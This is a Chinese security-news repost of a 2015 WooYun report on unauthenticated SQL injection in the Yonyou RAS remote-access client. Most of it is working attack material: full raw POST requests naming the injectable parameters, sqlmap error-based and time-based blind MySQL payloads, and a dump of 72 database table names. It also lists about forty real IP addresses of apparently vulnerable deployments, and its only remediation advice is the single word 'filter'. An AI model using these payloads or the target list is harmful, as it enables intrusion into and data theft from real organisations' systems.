记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

用友某客户端四处SQL注入影响众多系统(无需登录DBA权限)

2015-09-07 04:15

用友软件RAS标准版客户端(远程快速应用接入)



无需登录存在SQL注入。



第一处:

code 区域
POST /server/cmxpagedquery.php?pgid=AppList&SearchFlag=true HTTP/1.1

Content-Length: 136

Content-Type: application/x-www-form-urlencoded

Referer: http://116.236.131.194:8080/

Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E

Host: 116.236.131.194:8080

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: --user-agent "Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0"

Accept: */*



AppID%5b-1%5d=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8&ViewAppValue=1



参数ViewAppFld和ViewAppValue都存在注入。。



第二处:

code 区域
POST /server/cmxfolder.php?pgid=AppList&SearchFlag=true&t=1433251155 HTTP/1.1

Content-Length: 118

Content-Type: application/x-www-form-urlencoded

Referer: http://218.31.33.44:8888/

Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E

Host: 218.31.33.44:8888

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*



clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1ViewAppValue=1



参数ViewAppFld和ViewAppValue都存在注入。。

漏洞证明:

aaaaaaaaaa11111111111111111.jpg





aaaaaaaaaaa22222222222222.jpg





aaaaaaaaaa33333333333333.jpg





aaaaaaa4444444444444.jpg





aaaaaaaaaa55555555555555.jpg





code 区域
---

Parameter: ViewAppFld (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT 4416 FROM(SELECT COUNT(*),CONCAT(0x716a787871,(SELECT (ELT(4416=4416,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6748=6748&ViewAppValue=1



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT * FROM (SELECT(SLEEP(30)))porO) AND (5447=5447&ViewAppValue=1

---

web server operating system: Windows

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL >= 5.0.0

current database: 'rasdatabase'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: ViewAppFld (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT 4416 FROM(SELECT COUNT(*),CONCAT(0x716a787871,(SELECT (ELT(4416=4416,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6748=6748&ViewAppValue=1



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT * FROM (SELECT(SLEEP(30)))porO) AND (5447=5447&ViewAppValue=1

---

web server operating system: Windows

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL >= 5.0.0

Database: rasdatabase

[72 tables]

+---------------------------+

| hbadminrolegroupmembers |

| hbadminrolerestrictedorgs |

| hbadminroletask |

| hbadminroleusermembers |

| hbclientgroupapplication |

| hbclientgroupprinter |

| hbdirectoryapplication |

| hborgapplication |

| hborglicensepolicy |

| hborgpolicy |

| hbpolicyvalues |

| hbroletask |

| hbserverapplication |

| hbserverprinterdriver |

| hbserverprintinf |

| hbserverrole |

| hbservertask |

| hbtaskaction |

| hbtaskcondition |

| hbuserapplication |

| hbuserdirectory |

| hbuserorgs |

| hbuserpolicy |

| lograsarchi |

| lograsconcurrenta |

| lograsconcurrentus |

| lograsent |

| lograssessi |

| lograstaskactionhist |

| lograstaskhist |

| oemuserinfo |

| rasactions |

| rasadminroles |

| rasadmintasks |

| rasapplication |

| rasbadprinterdriver |

| rascfg |

| rasclient |

| rasclientgroup |

| rascompatibilitydriver |

| rasconcurrentsession |

| rasconditions |

| rasconnectionsetting |

| rasdatabase |

| rasdirectory |

| rasdmzserverd |

| rasdomain |

| rasgroupuser |

| rasinfocollectordata |

| rasjobs |

| rasjobsteps |

| raslicenseinfo |

| raslicensetoken |

| raslicpolicy |

| raslockdownpolicies |

| rasmonthlyminute |

| rasorgs |

| rasprinter |

| rasprinterdriver |

| rasproductk |

| rasreqids |

| rasroles |

| rasrunningservers |

| rasselection |

| rasserver |

| rasstyle |

| rastasks |

| rasticketing |

| rastimedsessio |

| rasuser |

| rasusermng |

| usermachines |

+---------------------------+





http://116.236.131.194:8080/

http://221.239.106.90:81/

http://61.161.199.197/

http://180.168.5.162:8080/

http://111.30.26.38:8000/

http://115.231.212.82:8080/

http://58.246.235.50/

http://218.31.33.158:8001/

http://60.10.34.57:8888/

http://218.207.195.169:8888/

http://122.224.243.218:8888/

http://124.172.246.131:81/

http://120.35.19.21:81/

http://222.69.38.12:8080/

http://61.161.182.38:8080/

http://125.93.255.209:8000/

http://223.197.196.73:81/

http://58.221.244.10:8080/

http://112.84.176.254:8000/

http://61.164.84.70:8080/

http://116.228.5.26:8080/

http://218.76.48.74:81/

http://140.207.74.170:81/

http://121.29.222.68:8080/

http://59.53.170.89:81/

http://218.31.33.44:8888/

http://60.190.102.141:8080/

http://60.12.220.103:8000/

http://122.227.192.250:8080/

http://59.37.7.110:8001/

http://222.223.228.247:81/

http://222.69.91.134:81/

http://116.228.113.155/

http://121.33.210.52:8080/

http://116.90.82.78:8000/

http://221.129.245.61:8080/

http://120.71.225.49:8000/

http://110.87.98.18:81/

http://60.29.103.158:8000/

http://120.193.185.187:81/

http://58.20.34.149:8080/

http://222.223.228.249:81/

http://210.22.101.234:8080/

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0117999

阅读:153868 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“用友某客户端四处SQL注入影响众多系统(无需登录DBA权限)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云